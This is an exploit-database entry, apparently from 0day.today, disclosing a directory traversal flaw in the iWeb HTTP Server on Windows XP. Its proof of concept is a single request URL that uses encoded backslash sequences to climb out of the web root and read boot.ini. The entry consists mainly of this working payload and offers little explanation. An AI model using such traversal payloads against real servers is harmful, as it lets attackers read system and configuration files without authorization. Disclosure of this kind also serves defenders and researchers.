id: 10111
date: 12/06/2009
title: iWeb HTTP Server Directory Transversal Vulnerability
author: mr_me
cves: 

====================================================
iWeb HTTP Server Directory Transversal Vulnerability
====================================================

#################################################################
#
# iWeb HTTP server Directory Transversal Vulnerability
# Found By: mr_me
# Download: http://www.ashleybrown.co.uk/iweb/
# Tested On: Windows XPSP3
#
#################################################################
 
POC:
 
http://server/..%5C..%5C..%5Cboot.ini



#  0day.today [2023-03-25]  #